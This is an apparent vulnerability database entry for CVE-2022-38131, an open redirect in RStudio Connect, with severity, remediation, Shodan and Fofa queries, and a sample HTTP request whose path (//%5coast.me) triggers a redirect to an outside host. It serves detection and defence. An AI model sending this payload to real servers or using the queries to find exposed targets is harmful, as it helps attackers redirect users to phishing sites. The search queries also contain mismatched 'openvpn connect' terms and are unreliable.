🔙 목록으로 돌아가기

CVE-2022-38131: RStudio Connect - Open Redirect

TitleRStudio Connect - Open Redirect
Authorxxcdd
SeverityMedium
ImpactAn attacker can exploit the vulnerability to redirect users to malicious websites, potentially leading to phishing attacks or other security breaches.
RemediationThis issue is fixed in Connect v2023.05. Additionally, for users running Connect v1.7.2 and later, the issue is resolvable via a configuration setting mentioned in the support article.
CVSS Score6.1
EPSS Score0.03774
CVE IDCVE-2022-38131
CWE IDCWE-601
Shodan Queryhttp.favicon.hash:217119619http.title:"openvpn connect"
Fofa Queryapp="RStudio-Connect"title="openvpn connect"
Tags tenable cve cve2022 redirect rstudio vuln

🔍 Vulnerability Description

RStudio Connect prior to 2023.01.0 is affected by an Open Redirect issue. The vulnerability could allow an attacker to redirect users to malicious websites.

🌐 HTTP Request

GET //%5coast.me HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Connection: close
Accept-Encoding: gzip

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2022/CVE-2022-38131.yaml

🦈 Packet Capture: ⬇️ Download cve-2022-38131.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A